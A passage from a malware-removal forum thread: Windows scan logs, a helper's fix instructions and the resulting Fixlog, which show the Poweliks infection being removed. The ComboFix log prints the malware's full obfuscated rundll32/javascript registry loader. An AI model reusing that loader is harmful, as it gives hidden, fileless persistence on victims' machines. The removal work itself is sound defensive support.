Realtek Ethernet Controller All-In-One Windows Driver (HKLM\...\{F7E7F0CB-AA41-4D5A-B6F2-8E6738EB063F}) (Version: 1.12.0019 - Realtek)
swMSM (Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
WebClient (HKLM\...\WebClient) (Version:  - )
Windows Live Communications Platform (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM\...\WinLiveSuite) (Version: 15.4.3508.1109 - Microsoft Corporation)
Windows Live Essentials (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live ID Sign-in Assistant (Version: 7.250.4225.0 - Microsoft Corporation) Hidden
Windows Live Installer (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Mail (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Mesh (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Mesh ActiveX Control for Remote Connections (HKLM\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
Windows Live Messenger (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live MIME IFilter (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Movie Maker (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Photo Common (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Photo Gallery (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live PIMT Platform (Version: 15.4.3508.1109 - Microsoft Corporation) Hidden
Windows Live Remote Client (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Windows Live Remote Client Resources (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Windows Live Remote Service (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Windows Live Remote Service Resources (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Windows Live SOXE (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live SOXE Definitions (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live UX Platform (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live UX Platform Language Pack (Version: 15.4.3508.1109 - Microsoft Corporation) Hidden
Windows Live Writer (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Writer Resources (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-151212660-612849681-608699423-1000_Classes\CLSID\{7B37E4E2-C62F-4914-9620-8FB5062718CC}\localserver32 -> C:\Users\abaskins\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-151212660-612849681-608699423-1000_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32 -> C:\Users\abaskins\AppData\Local\Microsoft\SkyDrive\17.0.2003.1112\SkyDriveShell.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-151212660-612849681-608699423-1000_Classes\CLSID\{AB807329-7324-431B-8B36-DBD581F56E0B}\localserver32 -> C:\Users\abaskins\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-151212660-612849681-608699423-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-151212660-612849681-608699423-1000_Classes\CLSID\{AD848A76-F236-5EE2-819B-2BDE7ED40AE7}\InprocServer32 -> C:\Users\abaskins\AppData\Roaming\Catalina – Print Savings\npBcsKtTcHW.dll (Catalina Marketing Corporation)
CustomCLSID: HKU\S-1-5-21-151212660-612849681-608699423-1000_Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32 -> C:\Users\abaskins\AppData\Local\Microsoft\SkyDrive\17.0.2003.1112\SkyDriveShell.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-151212660-612849681-608699423-1000_Classes\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\InprocServer32 -> C:\Users\abaskins\AppData\Local\Microsoft\SkyDrive\17.0.2003.1112\SkyDriveShell.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-151212660-612849681-608699423-1000_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32 -> C:\Users\abaskins\AppData\Local\Microsoft\SkyDrive\17.0.2003.1112\SkyDriveShell.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-151212660-612849681-608699423-1000_Classes\CLSID\{F8071786-1FD0-4A66-81A1-3CBE29274458}\InprocServer32 -> C:\Users\abaskins\AppData\Local\Microsoft\SkyDrive\17.0.2003.1112\FileSyncApi.dll (Microsoft Corporation)

==================== Restore Points  =========================

02-10-2014 08:00:19 Windows Update
07-10-2014 12:55:32 Windows Update
08-10-2014 22:26:27 Windows Backup

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:04 - 2014-10-08 15:06 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1       localhost

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {248971D0-E39F-4076-BDBA-AE7D95AC67C4} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-24] (Adobe Systems Incorporated)
Task: {3AE703EA-2737-4D57-AC65-A8A65FCBBB89} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX86\OfficeC2RClient.exe [2014-08-11] (Microsoft Corporation)
Task: {6201A570-A5D8-4D0D-BC1D-A634616FF349} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-09-26] (Piriform Ltd)
Task: {63CD49C5-E44E-449B-A532-7734952A69FF} - System32\Tasks\Dell\Client System Update => C:\Program Files\Dell\ClientSystemUpdate\DellClientSystemUpdate.exe [2012-10-11] (Dell Inc.)
Task: {722453B2-9FBF-4B53-84C0-B4D548146BEC} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonx86\Microsoft Shared\OFFICE15\OLicenseHeartbeat.exe [2014-09-26] (Microsoft Corporation)
Task: {74468FD7-7C28-4CA2-AE81-4F0C732E6C9F} - System32\Tasks\Microsoft\Windows\WindowsBackup\AutomaticBackup => Rundll32.exe /d sdengin2.dll,ExecuteScheduledBackup
Task: {92C865E4-8321-4449-8E83-585F2BCBD87F} - System32\Tasks\0814tbUpdateInfo => C:\ProgramData\Avg_Update_0814tb\0814tb_{A18B207A-001B-4807-9E21-92BFB36FCAC8}.exe [2014-08-26] ()
Task: {A725C167-1BA5-4AFB-812B-057EA862320C} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [2013-11-19] (Google Inc.)
Task: {C6B0E09A-4F30-4D6D-9323-84B034AF24D5} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2013-11-19] (Google Inc.)
Task: {E590A0A0-34BB-44FA-A535-9062BF2DA851} - System32\Tasks\Norton Security Scan for abaskins => C:\Program Files\Norton Security Scan\Engine\4.1.0.29\Nss.exe [2014-04-28] (Symantec Corporation)
Task: {EFA0270A-37B9-4C50-819E-AA46758AE770} - System32\Tasks\Microsoft Office 15 Sync Maintenance for ABASKINS-abaskins abaskins.smp.local => C:\Program Files\Microsoft Office 15\Root\Office15\MsoSync.exe [2014-09-26] (Microsoft Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\0814tbUpdateInfo.job => C:\ProgramData\Avg_Update_0814tb\0814tb_{A18B207A-001B-4807-9E21-92BFB36FCAC8}.exe
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\Norton Security Scan for abaskins.job => C:\PROGRA~1\NORTON~2\Engine\410~1.29\Nss.exe

==================== Loaded Modules (whitelisted) =============

2014-04-22 04:38 - 2014-05-20 03:11 - 00080040 _____ () C:\Program Files\Microsoft Office 15\ClientX86\ApiClient.dll
2014-05-14 11:45 - 2014-05-14 11:45 - 00090624 _____ () C:\Program Files\PasswordBox\libwebsocketswin32.dll
2013-03-11 15:57 - 2012-02-01 13:34 - 00094208 _____ () C:\Windows\System32\IccLibDll.dll
2013-03-11 14:23 - 2011-06-24 14:12 - 00965760 _____ () C:\Program Files\Conexant\SAII\SmartAudio.Desktop.dll
2014-04-14 14:41 - 2014-04-14 14:41 - 00039192 _____ () C:\Program Files\CCleaner\branding.dll
2014-04-14 08:54 - 2014-09-26 08:06 - 00316576 _____ () C:\Program Files\Microsoft Office 15\Root\Office15\AppVIsvStream32.dll
2014-04-10 14:30 - 2014-04-10 14:30 - 00134664 _____ () C:\Program Files\Dell Digital Delivery\ServiceTagPlusPlus.dll
2014-04-15 08:53 - 2013-09-12 13:54 - 01242584 _____ () C:\Program Files\Intel\Intel® Management Engine Components\LMS\ACE.dll
2014-09-26 08:30 - 2014-09-22 23:06 - 01098056 _____ () C:\Program Files\Google\Chrome\Application\37.0.2062.124\libglesv2.dll
2014-09-26 08:30 - 2014-09-22 23:06 - 00174408 _____ () C:\Program Files\Google\Chrome\Application\37.0.2062.124\libegl.dll
2014-09-26 08:30 - 2014-09-22 23:07 - 08577864 _____ () C:\Program Files\Google\Chrome\Application\37.0.2062.124\pdf.dll
2014-09-26 08:30 - 2014-09-22 23:07 - 00331592 _____ () C:\Program Files\Google\Chrome\Application\37.0.2062.124\ppGoogleNaClPluginChrome.dll
2014-09-26 08:30 - 2014-09-22 23:06 - 01660232 _____ () C:\Program Files\Google\Chrome\Application\37.0.2062.124\ffmpegsumo.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\GoToAssist => ""="Service"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

========================= Accounts: ==========================

abaskins (S-1-5-21-151212660-612849681-608699423 - Administrator - Enabled)
Administrator (S-1-5-21-151212660-612849681-608699423-500 - Administrator - Disabled)
Guest (S-1-5-21-151212660-612849681-608699423-501 - Limited - Disabled)

==================== Faulty Device Manager Devices =============

==================== Event log errors: =========================

Application errors:
==================
Error: (10/09/2014 07:45:13 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (10/09/2014 05:06:34 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17280, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17280, time stamp: 0x53f27d67
Exception code: 0xc0000005
Fault offset: 0x001c2455
Faulting process id: 0xe0
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (10/09/2014 02:43:29 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17280, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17280, time stamp: 0x53f27d67
Exception code: 0xc0000005
Fault offset: 0x001032c5
Faulting process id: 0x35ec
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (10/09/2014 00:45:21 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17280, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17280, time stamp: 0x53f27d67
Exception code: 0xc0000005
Fault offset: 0x001032c5
Faulting process id: 0x2ee4
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (10/09/2014 00:17:26 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17280, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17280, time stamp: 0x53f27d67
Exception code: 0xc00000fd
Fault offset: 0x000d6348
Faulting process id: 0x28c8
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (10/09/2014 00:09:12 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17280, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17280, time stamp: 0x53f27d67
Exception code: 0xc00000fd
Fault offset: 0x000d4417
Faulting process id: 0x29f8
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (10/08/2014 11:53:18 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17280, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17280, time stamp: 0x53f27d67
Exception code: 0xc00000fd
Fault offset: 0x000d6357
Faulting process id: 0x25c8
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (10/08/2014 11:25:00 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17280, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17280, time stamp: 0x53f27d67
Exception code: 0xc00000fd
Fault offset: 0x002d285c
Faulting process id: 0x1b0c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (10/08/2014 11:16:46 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17280, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17280, time stamp: 0x53f27d67
Exception code: 0xc00000fd
Fault offset: 0x000d6348
Faulting process id: 0x3744
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (10/08/2014 10:40:57 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17280, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17280, time stamp: 0x53f27d67
Exception code: 0xc00000fd
Fault offset: 0x000e0cd2
Faulting process id: 0x3360
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

System errors:
=============
Error: (10/09/2014 07:46:37 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (10/09/2014 07:44:19 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The vToolbarUpdater18.1.9 service failed to start due to the following error:
%%2

Error: (10/09/2014 07:44:17 AM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1055) (User: NT AUTHORITY)
Description: The processing of Group Policy failed. Windows could not resolve the computer name. This could be caused by one of more of the following:
a) Name Resolution failure on the current domain controller.
B) Active Directory Replication Latency (an account created on another domain controller has not replicated to the current domain controller).

Error: (10/09/2014 07:44:15 AM) (Source: NETLOGON) (EventID: 5719) (User: )
Description: This computer was not able to set up a secure session with a domain
controller in domain SMP due to the following:
%%1311

This may lead to authentication problems. Make sure that this
computer is connected to the network. If the problem persists,
please contact your domain administrator.

 

ADDITIONAL INFO

If this computer is a domain controller for the specified domain, it
sets up the secure session to the primary domain controller emulator in the specified
domain. Otherwise, this computer sets up the secure session to any domain controller
in the specified domain.

Error: (10/09/2014 07:44:06 AM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 7:42:22 AM on ‎10/‎9/‎2014 was unexpected.

Error: (10/09/2014 06:39:28 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {752073A1-23F2-4396-85F0-8FDB879ED0ED}

Error: (10/09/2014 05:43:31 AM) (Source: NETLOGON) (EventID: 5719) (User: )
Description: This computer was not able to set up a secure session with a domain
controller in domain SMP due to the following:
%%1311

This may lead to authentication problems. Make sure that this
computer is connected to the network. If the problem persists,
please contact your domain administrator.

 

ADDITIONAL INFO

If this computer is a domain controller for the specified domain, it
sets up the secure session to the primary domain controller emulator in the specified
domain. Otherwise, this computer sets up the secure session to any domain controller
in the specified domain.

Error: (10/09/2014 04:23:22 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {F9717507-6651-4EDB-BFF7-AE615179BCCF}

Error: (10/09/2014 01:33:56 AM) (Source: NETLOGON) (EventID: 5719) (User: )
Description: This computer was not able to set up a secure session with a domain
controller in domain SMP due to the following:
%%1311

This may lead to authentication problems. Make sure that this
computer is connected to the network. If the problem persists,
please contact your domain administrator.

 

ADDITIONAL INFO

If this computer is a domain controller for the specified domain, it
sets up the secure session to the primary domain controller emulator in the specified
domain. Otherwise, this computer sets up the secure session to any domain controller
in the specified domain.

Error: (10/09/2014 00:16:28 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Microsoft Office Sessions:
=========================
Error: (10/09/2014 07:45:13 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (10/09/2014 05:06:34 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.172804a5bc6b7MSHTML.dll11.0.9600.1728053f27d67c0000005001c2455e001cfe3a7479d67a5C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dllf23fa2be-4f9b-11e4-83c9-a41f726a3c7b

Error: (10/09/2014 02:43:29 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.172804a5bc6b7MSHTML.dll11.0.9600.1728053f27d67c0000005001032c535ec01cfe3935e516122C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dllf3985dc8-4f87-11e4-83c9-a41f726a3c7b

Error: (10/09/2014 00:45:21 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.172804a5bc6b7MSHTML.dll11.0.9600.1728053f27d67c0000005001032c52ee401cfe383eab47403C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll7495bd8c-4f77-11e4-83c9-a41f726a3c7b

Error: (10/09/2014 00:17:26 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.172804a5bc6b7MSHTML.dll11.0.9600.1728053f27d67c00000fd000d634828c801cfe37fbda41aa9C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll8e5290dc-4f73-11e4-83c9-a41f726a3c7b

Error: (10/09/2014 00:09:12 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.172804a5bc6b7MSHTML.dll11.0.9600.1728053f27d67c00000fd000d441729f801cfe37ed8c7dc3bC:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll67c1a8a0-4f72-11e4-83c9-a41f726a3c7b

Error: (10/08/2014 11:53:18 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.172804a5bc6b7MSHTML.dll11.0.9600.1728053f27d67c00000fd000d635725c801cfe37cb32ff1e9C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll2f3ec685-4f70-11e4-83c9-a41f726a3c7b

Error: (10/08/2014 11:25:00 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.172804a5bc6b7MSHTML.dll11.0.9600.1728053f27d67c00000fd002d285c1b0c01cfe378b4733074C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll3a89d4a6-4f6c-11e4-83c9-a41f726a3c7b

Error: (10/08/2014 11:16:46 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.172804a5bc6b7MSHTML.dll11.0.9600.1728053f27d67c00000fd000d6348374401cfe377c186ee1fC:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll14770e86-4f6b-11e4-83c9-a41f726a3c7b

Error: (10/08/2014 10:40:57 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.172804a5bc6b7MSHTML.dll11.0.9600.1728053f27d67c00000fd000e0cd2336001cfe3726af2869aC:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll13fa50be-4f66-11e4-83c9-a41f726a3c7b

==================== Memory info ===========================

Processor: Intel® Core™ i5-3470 CPU @ 3.20GHz
Percentage of memory in use: 54%
Total physical RAM: 3496.08 MB
Available physical RAM: 1584.04 MB
Total Pagefile: 6990.45 MB
Available Pagefile: 4503.08 MB
Total Virtual: 2047.88 MB
Available Virtual: 1899.11 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:214.27 GB) (Free:157.81 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 232.9 GB) (Disk ID: F7A08078)
Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
Partition 2: (Active) - (Size=18.6 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=214.3 GB) - (Type=07 NTFS)

==================== End Of Log ============================

 

 

 

 

I will check back periodically for any updates / suggestions you might make.

 

All the best,

Scott Stevenson



#4 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,285 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:07:04 PM

Posted 10 October 2014 - 07:24 AM

Hello Scott,

 

 

Please go ahead and uninstall Norton Security Scan and Catalina Savings Printer from the Control Panel.

 

Next please download the following file => and save it to the Desktop.
NOTE. It's important that both files, FRST and fixlist.txt are in the same location or the fix will not work.

Run FRST and press the Fix button just once and wait.
The tool will make a log on the Desktop (Fixlog.txt). Please post it to your reply.

 

 

 

Regards,

Georgi


cXfZ4wS.png


#5 stevesls

stevesls
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Alabama
  • Local time:12:04 PM

Posted 10 October 2014 - 09:17 AM

Greetings Georgi!

 

Thank you so much for your prompt attention and guidance. As you have suggested, I have removed 1 - Norton Security Scan and 2 - Catalina Savings Printer, the Norton uninstall ran perfectly and without any messages appearing during the uninstall process, however, I received TWO Error messages during the Catalina Savings Printer Uninstall. The FIRST message was:

 

Error 1404. Could not delete key \ Software\Classes\CLSID\{ad848a76-f236-5ee2-819bde7ed40ae7}\Programmable. Verify that you have sufficient access to that key, or contact your support personnel.

 

and the second:

 

Error 1404. Could not delete key \ Software\Classes\CLSID\{ad848a76-f236-5ee2-819b-2bde7ed40ae7}\Control. Verify that you have sufficient access to that key, or contact your support personnel.

 

Despite the error messages, it seems that Catalina Savings Printer has been at least partialyl uninstalled as it no linger appears on the list of installed applications.

 

As directed, I have downloaded the fixlist.txt to the desktop (where FRST also resides) and ran the "Fix" option from FRST. I am embedding the contents of the FIXLOG below for your review.

 

So far... I can confirm that the DLLHOST.EXE application is no longer appearing in the Task Manager Processes Tab... definitely looks like progress!!!!

 

Here is the FIXLOG:

 

***************************************************  FIXLOG.TXT  *****************************************************

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 06-10-2014 01
Ran by abaskins at 2014-10-10 08:25:04 Run:1
Running from C:\Users\abaskins\Desktop
Loaded Profile: abaskins (Available profiles: abaskins)
Boot Mode: Normal
 
==============================================
 
Content of fixlist:
*****************
start
HKU\S-1-5-21-151212660-612849681-608699423-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
CHR HKLM\...\Chrome\Extension: [cnpkmcjgpcihgfnkcjapiaabbbplkcmf] - C:\Program Files\Coupons.com CouponBar\chrome\Coupons.com.crx []
S2 vToolbarUpdater18.1.9; C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe [X]
R1 avgtp; C:\Windows\system32\drivers\avgtpx86.sys [42784 2014-08-12] (AVG Technologies)
C:\Windows\system32\drivers\avgtpx86.sys
S3 catchme; \??\C:\Users\abaskins\AppData\Local\Temp\catchme.sys [X]
Folder: C:\DLLHOST
cmd: type C:\ComboFix.txt
emptytemp:
end
*****************
 
"HKU\S-1-5-21-151212660-612849681-608699423-1000\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key Deleted Successfully.
"HKU\S-1-5-21-151212660-612849681-608699423-1000\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
"HKLM\SOFTWARE\Google\Chrome\Extensions\cnpkmcjgpcihgfnkcjapiaabbbplkcmf" => Key deleted successfully.
"C:\Program Files\Coupons.com CouponBar\chrome\Coupons.com.crx" => File/Directory not found.
vToolbarUpdater18.1.9 => Service deleted successfully.
avgtp => Service stopped successfully.
avgtp => Service deleted successfully.
C:\Windows\system32\drivers\avgtpx86.sys => Moved successfully.
catchme => Service deleted successfully.
 
========================= Folder: C:\DLLHOST ========================
 
2014-10-08 15:09 - 2014-10-08 15:09 - 0048229 _____ () C:\DLLHOST\ComboFix Log 1.txt
 
====== End of Folder: ======
 
 
=========  type C:\ComboFix.txt =========
 
ComboFix 14-10-04.01 - abaskins 10/08/2014  14:46:28.1.4 - x86
Microsoft Windows 7 Professional   6.1.7601.1.1252.1.1033.18.3496.1541 [GMT -5:00]
Running from: c:\users\abaskins\Desktop\ComboFix.exe
AV: ESET NOD32 Antivirus 7.0 *Disabled/Updated* {19259FAE-8396-A113-46DB-15B0E7DFA289}
SP: ESET NOD32 Antivirus 7.0 *Disabled/Updated* {A2447E4A-A5AC-AE9D-7C6B-2EC29C58E834}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\users\abaskins\GoToAssistDownloadHelper.exe
.
.
CLSID={AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} - infected with Poweliks and removed.
You should verify if current CLSID data is correct: 
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}
   <NO NAME> REG_SZ         Thumbnail Cache Class Factory for Out of Proc Server
   AppID REG_SZ         {AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\InprocServer32
   <NO NAME> REG_EXPAND_SZ   %SYSTEMROOT%\system32\thumbcache.dll
   ThreadingModel REG_SZ         Apartment
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\localserver32
   <NO NAME> REG_SZ         rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.c89e.b9g6:18e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))
